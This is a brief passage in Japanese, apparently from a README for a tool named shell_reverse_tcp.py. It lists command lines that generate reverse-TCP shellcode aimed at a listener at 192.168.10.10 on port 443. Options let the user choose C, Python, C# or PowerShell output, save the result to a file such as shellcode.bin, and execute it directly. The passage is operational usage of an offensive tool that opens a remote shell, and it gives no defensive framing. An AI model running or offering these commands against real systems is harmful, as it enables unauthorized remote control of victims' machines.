
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
デフォルトの言語はCタイプのシェルコードで、Python、C#、PowerShellも選択できます:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
ファイルを保存する場合:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
デフォルトの出力はoutput.binです:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
テストおよび実行の場合:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
そして:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin